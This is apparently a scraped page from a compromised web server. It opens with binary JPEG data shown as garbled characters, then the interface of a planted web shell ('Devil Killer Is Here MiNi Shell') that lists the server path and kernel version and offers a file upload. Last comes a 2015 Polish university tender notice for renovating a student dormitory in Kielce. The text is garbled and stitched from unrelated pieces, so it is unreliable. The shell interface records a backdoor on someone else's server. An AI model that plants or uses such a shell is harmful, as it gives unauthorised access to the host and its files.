JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150630/96567-N-2015.html

<p class="kh_header"><b>Kielce: Remont i przebudowa DS. nr 1 Filon Politechniki Świętokrzyskiej w zakresie pomieszczeń i instalacji wewnętrznych wraz z elementami zagospodarowania terenu</b><br>
<b>Numer ogłoszenia: 96567 - 2015; data zamieszczenia: 30.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Świętokrzyska , Al. Tysiąclecia Państwa Polskiego 7, 25-314 Kielce, woj. świętokrzyskie, tel. 041 3424150, faks 041 3443874,041 3424140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tu.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa DS. nr 1 Filon Politechniki Świętokrzyskiej w zakresie pomieszczeń i instalacji wewnętrznych wraz z elementami zagospodarowania terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane obejmujące Remont i przebudowę DS. nr 1 ,Filon Politechniki Świętokrzyskiej w zakresie pomieszczeń i instalacji wewnętrznych wraz z elementami zagospodarowania terenu
2. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa opracowana przez MFA Biuro Architektoniczne, 25-353 Kielce, ul. Wesoła 46/3;  pn. PRZEBUDOWA SZEŚCIU BUDYNKÓW DOMÓW STUDENTA POLITECHNIKI ŚWIĘTOKRZYSKIEJ POLEGAJĄCA NA DOBUDOWIE ZEWNĘTRZNYCH KLATEK SCHODOWYCH, TERMOMODERNIZACJI ŚCIAN ZEWNĘTRZNYCH I STROPODACHÓW ORAZ REMONCIE POLEGAJĄCYM NA MODERNIZACJI POMIESZCZEŃ I INSTALACJI WEWNĘTRZNYCH, w skład której wchodzą :
A) PROJEKTY:
- DS. 1 - FILON Projekt Architektoniczno-Budowlany Cz. I -  Architektura, 
- DS. 1 - FILON Projekt Wykonawczy Cz. III - Instalacje sanitarne (woda zimna i ciepła, kanalizacja sanitarna, gaz, wentylacja mechaniczna),
- DS. 1 - FILON Projekt Architektoniczno-Budowlany Cz. IV - Instalacje wentylacji oddymiającej,
- DS. 1 - FILON Projekt Architektoniczno-Wykonawczy Cz. V - Instalacje elektryczne,
- DS. 1 - FILON Projekt Wykonawczy Zamienny Cz. V - Instalacje elektryczne (okablowanie strukturalne),
- DS. 1 - FILON Projekt Architektoniczno-Budowlany Cz. VI - Instalacje teletechniczne - IT,
- DS. 1 - FILON Projekt Zagospodarowania terenu,
B) SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT:
- DS. 1 - FILON Specyfikacja Techniczna Wykonania i Odbioru Robót - Branża architektoniczna, konstrukcyjna  oraz zagospodarowania terenu, 
- DS. 1 - FILON Cz. III- Specyfikacja Techniczna Wykonania i Odbioru Robót  - wewnętrzne  instalacje sanitarne,
- DS. 1 - FILON Cz. IV- Specyfikacja Techniczna Wykonania i Odbioru Robót -instalacje wentylacji oddymiającej,
- DS. 1 - FILON Cz. V - Specyfikacja Techniczna Wykonania i Odbioru Robót - instalacje elektryczne,
- DS.1 - FILON Cz. V - Specyfikacja Techniczna Wykonania i Odbioru Robót - instalacje elektryczne (okablowanie strukturalne),
- DS.1 - FILON Cz. VI - Specyfikacja Techniczna Wykonania i Odbioru Robót instalacje teletechniczne,
C) OPIS ZAKRESU ROBÓT - stanowiące załącznik nr  1  do SIWZ.
3. Przedmiary robót, które Zamawiający załączył do SIWZ (załącznik nr 2) nie stanowią elementu dokumentacji projektowej. Przedmiary mają znaczenie orientacyjne i pomocnicze. W związku z tym,  zaleca się Wykonawcom dokonanie wizji lokalnej na miejscu  budowy i jego otoczenia oraz  uzyskania  wszystkich niezbędnych w ocenie  Wykonawcy dodatkowych  informacji  dotyczących wykonania przedmiotu zamówienia przed złożeniem oferty . 
4. Jeżeli, w dokumentacji projektowej, specyfikacji wykonania i odbioru robót  Zamawiający wskazuje dla niektórych materiałów, wyrobów i urządzeń nazwy, znaki towarowe lub po-chodzenie to,   wszystkie użyte nazwy, znaki towarowe, pochodzenie mają tylko takie znaczenie, że określają minimalne parametry techniczne i jakościowe  wyrobów, urządzeń oraz materiałów wymaganych przez Zamawiającego do wykonania przedmiotu zamówienia.  W stosunku do tych  materiałów, wyrobów i urządzeń Zamawiający dopuszcza możliwość zastosowania innych materiałów, wyrobów i urządzeń z tym  zastrzeżeniem, iż oferowane produkty  będą posiadały   parametry techniczne i jakościowe  nie gorsze  niż   te,  określone  przez Zamawiającego (materiały, wyroby i urządzenia równoważne).
5. Wykonawca, który przewiduje stosowanie materiałów, wyrobów  i urządzeń  równoważnych  ma obowiązek wskazać w ofercie  jakie konkretnie  materiały, wyroby  lub urządzenia  zastosuje.  Wykonawca wskazuje  je w kosztorysie ofertowym stanowiącym część składową oferty  lub w odrębnym dokumencie  załączonym do oferty. Oferując  materiały równoważne Wykonawca dokonuje  ich szczegółowego  opisu i  określa  parametry techniczne.  Parametry  techniczne i jakość materiałów, wyrobów i innych urządzeń równoważnych   muszą  być zgodne  z normami, atestami, świadectwami dopuszczenia do stosowania.  Ciężar wykazania  równoważności  spoczywa na Wykonawcy. 
6. W przypadku, gdy okaże się w toku wykonywania przedmiotu zamówienia, że zastosowanie materiałów, wyrobów  i urządzeń równoważnych wymagać będzie zmiany dokumentacji projektowej, Wykonawca uzyska na te zmiany zgodę Zamawiającego i projektanta oraz poniesie koszty związane z przeprojektowaniem. W przypadkach  uzasadnionych  rodzajem  wprowadzonych zmian , po analizie zaistniałego przypadku  i po uzyskaniu stanowiska  projektanta  oraz inspektora nadzoru  Zamawiający  będzie  uprawniony do modyfikacji sposobu świadczenia Wykonawcy. Skutki przeprojektowania nie mogą  powodować zmiany terminu  wykonania przedmiotu umowy  oraz  wynagrodzenia  należnego  Wykonawcy.
7. Jeżeli, dostarczona przez Zamawiającego dokumentacja projektowa będzie zawierała wady, które uniemożliwią prawidłowe wykonanie przedmiotu umowy Wykonawca niezwłocznie powiadomi  o tym Zamawiającego  na piśmie.  W zawiadomieniu  należy   wskazać  rodzaj, charakterystykę wady,  wpływ  wad  na wykonanie przedmiotu umowy.  Zamawiający dokona analizy zaistniałego przypadku i po uzyskaniu stanowiska projektanta, inspektora nadzoru gdy uzna,  iż wady mają znaczący wpływ na wykonanie przedmiotu umowy będzie  uprawniony do modyfikacji sposobu świadczenia  przez  Wykonawcę, w taki sposób aby zrealizowany był cel umowy z zachowaniem obowiązujących przepisów.
Dokonując modyfikacji sposobu świadczenia, strony  wyodrębnią: 
a. roboty zamienne, przez które rozumie się  roboty,  które Wykonawca  wykona w zamian  robót  zawartych w pierwotnej dokumentacji projektowej,
b. roboty zaniechane,  przez które rozumie się roboty objęte pierwotną  dokumentacją,  których wykonanie stało się zbędne.
8. W przypadku gdy  nastąpi  konieczność istotnej modyfikacji  sposobu świadczenia w okolicznościach wskazanych w  pkt. 6 i 7  strony  dokonają zmiany  umowy  w formie  aneksu.
9. Zamawiający wymaga od  Wykonawcy  udzielenia  gwarancji na okres  nie krótszy niż 36 miesięcy a nie dłuższy  niż  72 miesiące. Wykonawca w ofercie wskazuje  okres  na jaki udziela gwarancji. Bieg  okresu  gwarancji  rozpoczyna się  w dniu  podpisania protokołu odbioru końcowego przedmiotu umowy. W ramach gwarancji Wykonawca zobowiązuje się do usuwania wad i usterek  , które ujawnią się  w okresie  gwarancji , na własny koszt w terminie nie dłuższym niż 14 dni od daty zgłoszenia wad i usterek  przez Zamawiającego. W ramach gwarancji Wykonawca dokonuje  także  bezpłatnych  przeglądów gwarancyjnych z częstotliwością nie mniejszą niż 1 raz w roku kalendarzowym. W przypadku, gdy Wykonawca nie usunie wad i usterek w  terminie,  Zamawiający jest  uprawniony do naliczania kar umownych z tego tytułu zgodnie z postanowieniami umowy. Jeżeli,  opóźnienie  w usunięciu wad  lub  usterek  przekracza  30 dni od dnia  wezwania do ich usunięcia  Zamawiający jest uprawniony  do usunięcia  ich  na koszt Wykonawcy, przy użyciu osób trzecich, bez utraty praw wynikających z gwarancji lub rękojmi.  Kosztami  z tytułu zastępczego usunięcia wad i usterek  Zamawiający obciąża Wykonawcę. Niezależnie od gwarancji Zamawiający jest uprawniony do realizacji praw z tytułu rękojmi. Okres rękojmi  wydłuża się  na okres  równy okresowi gwarancji. Rękojmia jest  realizowana na zasadach  przewidzianych w Kodeksie cywilnym dla umów dotyczących sprzedaży rzeczy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do 20% wartości robot będących przedmiotem zamówienia,  które wykraczają poza opis przedmiotu zamówienia i polegają  na powtórzeniu tego samego rodzaju robót  budowlanych, które  są  przedmiotem zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.40.00.00-1, 45.45.30.00-7, 45.26.23.00-4, 45.26.10.00-4, 45.26.25.20-2, 45.32.00.00-6, 45.32.24.00-4, 45.42.10.00-4, 45.43.21.21-8, 45.45.00.00-6, 45.33.00.00-7, 45.31.11.00-1, 45.31.00.00-3, 45.31.21.00-8, 45.33.12.10-1, 45.44.21.10-1, 45.43.10.00-7, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca  przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie: 30.000,00 PLN (słownie: trzydzieści tysięcy złotych). Potwierdzoną za zgodność kopię dowodu wpłaty wadium należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnień do wykonywania działalności lub czynności związanych z  realizacją przedmiotu zamówienia. Ocena spełnienia warunków odbywać się będzie metodą spełnia lub nie spełnia na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia - Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert wykonał co najmniej 2 roboty budowlane o wartości nie niższej niż 2 500 000 zł każda, porównywalne z przedmiotem zamówienia pod względem rodzaju. Ocena spełnienia warunków odbywać się będzie metodą spełnia lub nie spełnia na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli wykaże, że dysponuje osobami do kierowania robotami budowlanymi w specjalności:
- konstrukcyjno-budowlanej bez ograniczeń,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń i co najmniej jedną osobą posiadającą zaświadczenie kwalifikacyjne E do 1 kV, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń. Ocena spełnienia warunków odbywać się będzie metodą spełnia lub nie spełnia na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie sytuacji ekonomicznej i finansowej - Wykonawca potwierdzi spełnienie niniejszego warunku udziału w postępowaniu  jeśli wykaże, że:
- posiada rachunek  potwierdzający wysokość posiadanych własnych środków finansowych lub zdolności kredytowej Wykonawcy w kwocie  nie mniejszej  niż: 1 500 000- zł ,
- podlega ubezpieczeniu od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę  nie mniejszą niż 1 500 000 złotych. Ocena spełnienia warunków odbywać się będzie metodą spełnia lub nie spełnia na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych robót budowlanych w okresie ostatnich  pięciu lat przed upływem terminu składania ofert w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane należycie,  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; Dowodami potwierdzającymi  należyte wykonanie robót są  poświadczenie  lub inne dokumenty  jeżeli  z uzasadnionych przyczyn o obiektywnym charakterze  Wykonawca nie jest w stanie pozyskać  poświadczenia .
Wzór wykazu - Załącznik nr 6 do specyfikacji. Wymagana forma dokumentu oryginał lub kopia poświadczona za zgodność z oryginałem.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy wykazując  spełnienie warunków  udziału w postępowaniu  Wykonawca polega  na wiedzy  i doświadczeniu , potencjalne technicznym, osobach zdolnych  do wykonania  zamówienia  lub zdolnościach finansowych innych podmiotów na zasadzie  art. 26 ust.2b   ustawy PZP  jest zobowiązany złożyć : 
a) pisemne zobowiązanie tych podmiotów  do oddania Wykonawcy do dyspozycji  niezbędnych zasobów  na okres korzystania  z nich przy wykonywaniu zamówienia,  
b) w przypadku gdy  Wykonawca polega na zdolnościach finansowych innych podmiotów informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącej tych podmiotów, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową tych podmiotów, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
c) umowy, porozumienia lub inne sporządzone dwustronnie przez Wykonawcę i podmiot trzeci dokumenty , które potwierdzają:
- sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonaniu zamówienia
- charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem
Wymagana forma dokumentów: kserokopia dokumentów odnoszących się do tych podmiotów, potwierdzona  za zgodność z oryginałem przez  wykonawcę lub podmiot trzeci.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy  po jej zawarciu   może nastąpić w zakresie:
a) zmiany sposobu świadczenia  w okolicznościach,  o których mowa   § 1 ust. 5  - 7 wzoru umowy , 
b) zmiany wynagrodzenia ryczałtowego w okolicznościach,  o których mowa w § 7  ust 4 - 11 wzoru umowy .
c) zmiany terminu wykonania przedmiotu umowy w przypadku okolicznościach, o których mowa §2 ust. 6 - 8 wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tu.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Świętokrzyska w Kielcach, Aleja Tysiąclecia Państwa Polskiego nr 7, 25-314 Kielce, Budynek B, pokój nr 2.33 (Dział Zamówień Publicznych)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2015 godzina 12:00, miejsce: Politechnika Świętokrzyska w Kielcach, Aleja Tysiąclecia Państwa Polskiego nr 7, 25-314 Kielce, Budynek B, pokój nr 2.33 (Dział Zamówień Publicznych)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





